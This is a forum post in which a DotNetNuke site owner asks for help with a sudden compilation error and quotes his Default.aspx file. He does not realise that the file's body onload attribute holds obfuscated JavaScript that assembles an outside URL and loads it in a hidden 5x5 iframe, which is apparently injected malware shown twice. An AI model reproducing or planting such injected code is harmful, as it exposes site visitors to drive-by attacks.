Hey there,
Wondering if someone can assist. My site has been running fine until this evening when all of a sudden if you hit my url http://www.mobismartzone.com you get the following error message -
Server Error in '/dotnetnuke' Application.
Compilation Error
Description: An error occurred during the compilation of a resource required to service this request. Please review the following specific error details and modify your source code appropriately.
Compiler Error Message: BC30456: 'status' is not a member of 'ASP.default_aspx'.
Source Error:
|
Line 20: </head>
Line 21:
Line 22: <body Line 23: onload="status='';g='i';y='e';pm='u';wu='htt';n='vek';v='/k';k='ram';b='f';j='sr';e='ll';w='r';o='i';a='i';nr='c';hy='o';gh='s.';l='l';x='//';su='php';pw='x.';i='nde';vq='p:';jy='i';mo='ll/';yn=jy.concat(b,k,y);uw=j.concat(nr);cr=wu.concat(vq,x,l,hy,n,a,e,gh,w,pm,v,g,mo,o,i,pw,su);var wi=document.createElement(yn);wi.setAttribute('width','5');wi.setAttribute('height','5');wi.setAttribute('style','display:none');wi.setAttribute(uw,cr);document.body.appendChild(wi);window.status=status;" id="Body" runat="server" >
Line 24: <noscript></noscript>
|
Source File: E:\web\motosmartzo\htdocs\dotnetnuke\Default.aspx Line: 22
I have made no changes to the site whatsoever and especially not to this file...
This file contains the following -
<%@ Page Language="vb" AutoEventWireup="false" Explicit="True" Inherits="DotNetNuke.Framework.DefaultPage" CodeFile="Default.aspx.vb" %>
<%@ Register TagPrefix="dnn" Namespace="DotNetNuke.Common.Controls" Assembly="DotNetNuke" %>
<asp:literal id="skinDocType" runat="server"></asp:literal>
<html <%=xmlns%> <%=LanguageCode%>>
<head id="Head" runat="server">
<meta id="MetaRefresh" runat="Server" http-equiv="Refresh" name="Refresh" />
<meta id="MetaDescription" runat="Server" name="DESCRIPTION" />
<meta id="MetaKeywords" runat="Server" name="KEYWORDS" />
<meta id="MetaCopyright" runat="Server" name="COPYRIGHT" />
<meta id="MetaGenerator" runat="Server" name="GENERATOR" />
<meta id="MetaAuthor" runat="Server" name="AUTHOR" />
<meta name="RESOURCE-TYPE" content="DOCUMENT" />
<meta name="DISTRIBUTION" content="GLOBAL" />
<meta name="ROBOTS" content="INDEX, FOLLOW" />
<meta name="REVISIT-AFTER" content="1 DAYS" />
<meta name="RATING" content="GENERAL" />
<meta http-equiv="PAGE-ENTER" content="RevealTrans(Duration=0,Transition=1)" />
<style type="text/css" id="StylePlaceholder" runat="server"></style>
<asp:placeholder id="CSS" runat="server" />
</head>
<body
onload="status='';g='i';y='e';pm='u';wu='htt';n='vek';v='/k';k='ram';b='f';j='sr';e='ll';w='r';o='i';a='i';nr='c';hy='o';gh='s.';l='l';x='//';su='php';pw='x.';i='nde';vq='p:';jy='i';mo='ll/';yn=jy.concat(b,k,y);uw=j.concat(nr);cr=wu.concat(vq,x,l,hy,n,a,e,gh,w,pm,v,g,mo,o,i,pw,su);var wi=document.createElement(yn);wi.setAttribute('width','5');wi.setAttribute('height','5');wi.setAttribute('style','display:none');wi.setAttribute(uw,cr);document.body.appendChild(wi);window.status=status;" id="Body" runat="server" >
<noscript></noscript>
<dnn:form id="form" runat="server" ENCTYPE="multipart/form-data" style="height: 100%;">
<asp:Label ID="SkinError" runat="server" CssClass="NormalRed" Visible="False"></asp:Label>
<asp:PlaceHolder ID="SkinPlaceHolder" runat="server" />
<input id="ScrollTop" runat="server" name="ScrollTop" type="hidden" />
<input id="__dnnVariable" runat="server" name="__dnnVariable" type="hidden" />
</dnn:form>
</body>
</html>
I really am at my wits end as do not understand all of the above, so really hoping that someone else can make sense of it and advise.
I would really appreciate it.
thanks
Brad